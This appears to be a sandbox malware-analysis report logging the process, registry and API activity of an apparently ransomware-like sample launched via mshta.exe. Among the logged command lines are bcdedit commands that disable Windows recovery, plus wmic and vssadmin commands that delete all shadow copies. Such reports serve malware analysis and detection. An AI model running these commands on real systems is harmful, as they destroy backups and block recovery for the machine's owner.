| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Process | Create | process_name = C:\WINDOWS\system32\vssadmin.exe, os_pid = 0x7b4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 |
Process #17: cmd.exe
56
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:19, Reason: Child Process |
| Unmonitor | End Time: 00:04:29, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4a4 |
| Parent PID | 0xec8 (c:\windows\syswow64\mshta.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FB4
0x
B0C
|
Threads
Thread 0xfb4
56
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0xc00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
2 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 98 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #20: cmd.exe
56
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:19, Reason: Child Process |
| Unmonitor | End Time: 00:04:29, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x344 |
| Parent PID | 0xec8 (c:\windows\syswow64\mshta.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EE4
0x
FF8
|
Threads
Thread 0xee4
56
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0xc00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 88, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\FD1HVy\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
2 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 98 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #22: wmic.exe
157
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\wbem\wmic.exe |
| Command Line | wmic SHADOWCOPY DELETE |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:47, Reason: Self Terminated |
| Monitor Duration | 00:00:21 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb4 |
| Parent PID | 0x868 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D80
0x
CE4
0x
D98
0x
C48
0x
86C
|
Threads
Thread 0xd80
157
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0x160000 |
|
1 | |
| COM | Create | interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\WINDOWS\system32 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 |
|
1 | |
| COM | Create | interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Local Time, time = 2019-04-12 11:18:47 (Local Time) |
|
1 |
Process #23: vssadmin.exe
0
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\vssadmin.exe |
| Command Line | vssadmin Delete Shadows /All /Quiet |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:04:26, Reason: Child Process |
| Unmonitor | End Time: 00:04:41, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7b4 |
| Parent PID | 0xf28 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9FC
0x
9E4
0x
F40
0x
E0
0x
E20
0x
E10
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| vssadmin.exe | 0x00A30000 | 0x00A4EFFF | Process Termination | - | 32-bit | - |
|
|
|
